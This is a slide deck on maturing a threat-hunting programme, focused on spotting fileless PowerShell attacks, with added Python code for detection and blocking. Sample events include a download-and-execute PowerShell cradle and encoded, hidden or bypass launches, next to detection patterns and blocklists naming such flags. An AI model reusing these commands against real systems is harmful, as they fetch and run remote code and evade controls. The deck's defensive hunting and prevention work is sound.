Maturing your threat hunting program
1. Total Endpoint Protection: #1 in EDR & Next-Gen AV
Threat Hunting 102: Beyond The Basics, Maturing Your Threat Hunting Program
2. Who Am I?
Jayson Wehrend
Senior Sales Engineer, Cybereason
Former Tech Consultant, RSA
3. Why We’re Here Today
o Quick hunting refresher
o I’m hunting! Now what?
o Giving back & process integration
o Expanded PowerShell use case
4. REFRESHER: HUNTING DEFINED.
The process of proactively discovering undesirable activity to elicit a positive outcome.
5. REFRESHER: WHY?
Prepare? It’s very hard to defend what you can’t see and don’t understand.
Be proactive? Don’t wait for the bad to happen, then have to react to fix.
Fix stuff? Especially before it breaks!
6. Time to Change.
“Intelligence is the ability to adapt to change.” -- Stephen Hawking
7. The Hunting Process
Motivation + Hypothesis → Data Collection → Tooling / Analysis → Outcomes → Automation
8. I’m Hunting! Now What?
o We’re Giving Back!
– Incidents
– Detection improvements / new collection techniques
– Prevention with confidence
– Improve response / triage
– Configuration management / compliance / audit
9. Incident Response Process
Prepare → Detect → Respond → Contain / Eradicate → Post-Mortem / Prevent
10. Incident Response Process ↔ Hunting Process
Incident Response Process: Prepare → Detect → Respond → Contain / Eradicate → Post-Mortem / Prevent
Hunting Process: Motivation + Hypothesis → Data Collection → Tooling / Analysis → Outcomes → Automation*
Links between the two:
– Use blind spots/gaps as sources of motivation + hypothesis
– High fidelity detections
– Escalated incident
– New data collection & analysis techniques improve triage & response SOPs
11. Hunting: A Deeper Dive
o Previous outcomes create new motivation + hypotheses
o Introducing new datasets to expand previous outcomes
o Data stacking becomes more crucial to the journey to analysis/data science
13. File-less Techniques: PowerShell
Process Execution
– Hidden: commandLine:hidden|1|-nop|iex|-invoke|ICM|scriptblock
– Obfuscated: commandLine:`|1|^|+|$|*|&|.
– Encoded: commandLine:nop|nonl|nol|bypass|e|enc|ec
– Download Commands: commandLine:DownloadFile|IWR|Invoke-WebRequest|IRM|Invoke-RestMethod|DownloadString|BITS
– Shellcode DLL Execution: commandLine:dllimport|virtualalloc
– Parent/child Profiling: Parent:wscript|mshta|MSOffice|Browser|WMI*
Persistence
– Service = commandline:powershell or .ps*
– Registry = commandline:powershell or .ps*
Network Comms
– Int2Ext Profiling: Connections → Filter:isExternalConnection:True
– URL: .ps*
– DNS Queries: TXT C2; Received vs. Transmitted Ratios
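Here is an added example, not from the deck, that turns the query strings above into detection logic: the slide's indicator groups are transcribed into Python regexes, run over constructed sample process events, and the results are stacked by parent image so that rare parents stand out (the data-stacking step the deck mentions under "A Deeper Dive"). The regex forms, the expansion of MSOffice/Browser/WMI* into image names, the reading of the bare `1` as `-w 1`, and the obfuscation-character threshold are my assumptions.

```python
"""Hunting PowerShell process telemetry with the deck's indicator groups.

Added example (not from the deck): search strings become regexes, run over
constructed sample events, with results stacked by parent image.
"""
import re
from collections import Counter

# Indicator groups transcribed from the slide (regex form is mine).
# Assumptions: the bare "1" in the hidden group is read as "-w 1"; "IWE" is
# read as the iwr alias of Invoke-WebRequest; "." is dropped from the
# obfuscation character set because it matches nearly every command line.
INDICATORS = {
    "hidden": re.compile(r"hidden|-w\s*1\b|-nop\b|\biex\b|-invoke|\bicm\b|scriptblock", re.I),
    "encoded": re.compile(r"-(?:nop|nonl|nol|e|ec|enc)\b|bypass", re.I),
    "download": re.compile(
        r"DownloadFile|\biwr\b|Invoke-WebRequest|\birm\b|Invoke-RestMethod|DownloadString|\bBITS", re.I),
    "shellcode": re.compile(r"dllimport|virtualalloc", re.I),
}
OBFUSCATION_CHARS = set("`^+$*&")
OBFUSCATION_THRESHOLD = 4  # obfuscation characters needed before a line is flagged

# Parent:wscript|mshta|MSOffice|Browser|WMI* expanded to image names (my expansion)
SUSPICIOUS_PARENTS = re.compile(
    r"^(wscript|mshta|winword|excel|powerpnt|outlook|chrome|firefox|msedge|iexplore|wmiprvse)\.exe$",
    re.I)

# Constructed sample telemetry: one record per PowerShell process start.
# 203.0.113.5 is a documentation address, not a real host.
EVENTS = [
    {"id": 1, "parent": "explorer.exe", "external": False,
     "cmdline": r"powershell.exe -NoProfile -File C:\Scripts\inventory.ps1"},
    {"id": 2, "parent": "explorer.exe", "external": False,
     "cmdline": r"powershell.exe -NoProfile -File C:\Scripts\inventory.ps1"},
    {"id": 3, "parent": "WINWORD.EXE", "external": True,
     "cmdline": "powershell -w hidden -nop -ep bypass -enc SQBFAFgAIAAoAE4A"},
    {"id": 4, "parent": "wscript.exe", "external": True,
     "cmdline": "powershell -c \"IEX (New-Object Net.WebClient).DownloadString('http://203.0.113.5/s.ps1')\""},
    {"id": 5, "parent": "cmd.exe", "external": False,
     "cmdline": "powershell -c \"$x=('Ne'+'w-Ob'+'ject');&$x Net.WebClient\""},
    {"id": 6, "parent": "mshta.exe", "external": False,
     "cmdline": "powershell -nop -c \"[DllImport('kernel32')] VirtualAlloc\""},
]


def classify(cmdline):
    """Return the set of indicator groups a single command line matches."""
    hits = {name for name, rx in INDICATORS.items() if rx.search(cmdline)}
    if sum(ch in OBFUSCATION_CHARS for ch in cmdline) >= OBFUSCATION_THRESHOLD:
        hits.add("obfuscated")
    return hits


def hunt(events):
    """Return one finding per event that matches at least one indicator."""
    findings = []
    for ev in events:
        cats = classify(ev["cmdline"])
        if SUSPICIOUS_PARENTS.match(ev["parent"]):
            cats.add("suspicious_parent")
        if ev["external"]:  # the Int2Ext profiling filter from the slide
            cats.add("external_connection")
        if cats:
            findings.append({"id": ev["id"], "parent": ev["parent"].lower(),
                             "categories": sorted(cats)})
    return findings


def stack_by_parent(events):
    """Data stacking: how often each parent image spawns PowerShell."""
    return Counter(ev["parent"].lower() for ev in events)


def rare_parents(events, max_count=1):
    """Parents seen at most max_count times: the long tail worth a closer look."""
    return sorted(p for p, n in stack_by_parent(events).items() if n <= max_count)


if __name__ == "__main__":
    for finding in hunt(EVENTS):
        print(finding)
    print("rare parents:", rare_parents(EVENTS))
```

Two things this demonstrates that the query list alone does not: the legitimate `-NoProfile -File` scheduled script (events 1 and 2) produces no hits even though it shares a prefix with `-nop`, and the obfuscated launcher (event 5) is caught by character counting rather than by any keyword, which is why the deck lists the punctuation characters as a separate group.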
14. Giving Back…Incident Escalation
o Incident 1: PowerShell Web Client – Downloading Stage 2 Payload
o Incident 2: Remote .ps file execution / invoking shellcode
o Incident 3: Mismatched Services – Adversarial use of .ps
o Incident 4: Data Exfil – PowerShell BITSTransfer
15. Giving Back…Prevention
o Block execution of PowerShell.exe on all systems where it’s not in use for administrative purposes
o Force specific Parent/Child Process Relationships – block MSOffice|Wscript|Mshta|Browsers|WMI spawning PowerShell.exe
o Anchor PowerShell scripts to specific server directories; block .ps* from running directly on a system
o Use the endpoint firewall to prevent PowerShell.exe from connecting to non-approved IPs
o Block “Bypass”, “Hidden”, “DownloadString”, “WebClient”, “DLLImport”, “VirtualAlloc” as command line arguments for execution by an unauthorized user
o See #2 for allowing valid applications
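The prevention rules above as policy-as-code, an added example that is not the deck's or Cybereason's code: each bullet becomes one check, evaluated in slide order against constructed process events, and the first violated rule decides. Host names, the script share path, the approved network, user names and the expansion of MSOffice/Browsers/WMI into image names are all placeholders I chose.

```python
"""Policy-as-code for the deck's PowerShell prevention rules.

Added example (not from the deck): every policy value below is a
placeholder; a real deployment fills them from the CMDB, GPO or EDR console.
"""
import ipaddress
import re

POLICY = {
    # Rule 1: systems where PowerShell is in administrative use
    "admin_hosts": {"admin-jump01", "srv-build02"},
    # Rule 2: parents never allowed to spawn PowerShell
    # (my expansion of MSOffice|Wscript|Mshta|Browsers|WMI to image names)
    "blocked_parents": re.compile(
        r"^(winword|excel|powerpnt|outlook|wscript|mshta|chrome|firefox|msedge|iexplore|wmiprvse)\.exe$",
        re.I),
    # Rule 3: the only directories scripts may be launched from
    "script_dirs": ["\\\\scripts01\\ops\\"],
    # Rule 4: networks PowerShell may connect to
    "approved_nets": [ipaddress.ip_network("10.0.0.0/8")],
    # Rule 5: restricted arguments, and the users allowed to use them
    "blocked_args": re.compile(r"bypass|hidden|downloadstring|webclient|dllimport|virtualalloc", re.I),
    "authorized_users": {"CORP\\svc-automation", "CORP\\jdoe-admin"},
}

# Anything that looks like a .ps1/.psm1/.psd1 path on the command line
SCRIPT_TOKEN = re.compile(r"""[^\s"']+\.ps(?:1|m1|d1)\b""", re.I)


def evaluate(event, policy=POLICY):
    """Apply the prevention rules in slide order; return (decision, reason)."""
    if event["host"].lower() not in policy["admin_hosts"]:
        return ("block", "host is not an administrative system")
    if policy["blocked_parents"].match(event["parent"]):
        return ("block", "parent process not permitted to spawn PowerShell")
    for script in SCRIPT_TOKEN.findall(event["cmdline"]):
        if not any(script.lower().startswith(d.lower()) for d in policy["script_dirs"]):
            return ("block", "script not anchored to an approved server directory")
    dest = event.get("dest_ip")
    if dest and not any(ipaddress.ip_address(dest) in net for net in policy["approved_nets"]):
        return ("block", "connection to non-approved IP")
    if policy["blocked_args"].search(event["cmdline"]) and event["user"] not in policy["authorized_users"]:
        return ("block", "restricted argument used by unauthorized user")
    return ("allow", "policy satisfied")


# Constructed sample events; 203.0.113.9 is a documentation address.
SAMPLE_EVENTS = [
    {"host": "admin-jump01", "user": "CORP\\jdoe-admin", "parent": "explorer.exe",
     "cmdline": r"powershell -File \\scripts01\ops\inventory.ps1", "dest_ip": "10.1.2.3"},
    {"host": "ws-0412", "user": "CORP\\bob", "parent": "explorer.exe",
     "cmdline": "powershell -c Get-Date", "dest_ip": None},
    {"host": "admin-jump01", "user": "CORP\\jdoe-admin", "parent": "WINWORD.EXE",
     "cmdline": "powershell -c Get-Date", "dest_ip": None},
    {"host": "admin-jump01", "user": "CORP\\jdoe-admin", "parent": "explorer.exe",
     "cmdline": r"powershell -File C:\Users\bob\Downloads\x.ps1", "dest_ip": None},
    {"host": "admin-jump01", "user": "CORP\\jdoe-admin", "parent": "explorer.exe",
     "cmdline": "powershell -c Get-Process", "dest_ip": "203.0.113.9"},
    {"host": "admin-jump01", "user": "CORP\\bob", "parent": "explorer.exe",
     "cmdline": r"powershell -ep bypass -File \\scripts01\ops\inventory.ps1", "dest_ip": None},
    {"host": "admin-jump01", "user": "CORP\\jdoe-admin", "parent": "explorer.exe",
     "cmdline": r"powershell -ep bypass -File \\scripts01\ops\inventory.ps1", "dest_ip": None},
]


def apply_policy(events, policy=POLICY):
    """Evaluate every event and return the list of (decision, reason) tuples."""
    return [evaluate(ev, policy) for ev in events]


if __name__ == "__main__":
    for ev, (decision, reason) in zip(SAMPLE_EVENTS, apply_policy(SAMPLE_EVENTS)):
        print(f"{ev['host']:<13} {ev['parent']:<12} {decision:<5} {reason}")
```

The last two events differ only in the user: the same `-ep bypass` launch from the approved script share is blocked for an ordinary user and allowed for an authorized administrator, which is the "by an unauthorized user" qualifier from the slide and the reason rule 5 is checked after the script-directory rule rather than instead of it.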
16. Thank you! Questions?
jayson.wehrend@cybereason.com
@cybereason